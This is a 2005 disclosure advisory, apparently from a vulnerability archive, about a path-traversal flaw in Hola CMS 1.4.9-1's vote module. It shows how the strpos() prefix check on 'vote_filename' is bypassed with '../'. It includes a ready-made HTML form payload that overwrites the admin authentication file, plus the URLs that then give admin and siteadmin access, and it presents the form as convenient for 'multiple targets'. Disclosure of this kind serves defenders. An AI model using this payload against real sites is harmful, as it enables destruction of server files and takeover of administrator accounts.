Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access

Type securityvulns
Reporter Securityvulns
Modified 2005-03-16T00:00:00


Virginity Security Advisory 2005-002

         DATE : 2005-03-13 15:11 GMT
         TYPE : remote

VERSIONS AFFECTED : hola-cms-1.4.9-1 ( AUTHOR : Virginity ADVISORY NUMBER : 004


Like the one in SA-2005-001: A new patched version 1.4.9-1 got released where that issue was marked as solved. The Vote-Module(vote_save_results.php) now checks with strpos() wether the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../ we can still manipluate or destroy every file on the whole server by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!! Below the updated example how to destroy login-authentification file and gaining access to admin-functions!

Really sad that the quick patch (released 3? hours after notifcation) doesn't really work.

Author of the Software has been notified.


Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1" method="POST"> <input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php"> <input type="hidden" name="result" value="0"> <input type="submit" value="Stimme abgeben" name="button"> </form>

Of course you'll have to edit [target] and [site-with-vote] to match your site! Now when you push the button the first lines of the multiuser.php (which includes the authentication mechanism) get overwritten and by calling http://[target]/admin/index_cms.php you have access to all user functions. by calling http://[target]/admin/[module you want].php?username=siteadmin to all siteadmin functions!


Use other CMS... i think PHP-Nuke isn't that vulnerable ;)

Personal note:

YES! The girl did it again :) Contact me on IRC!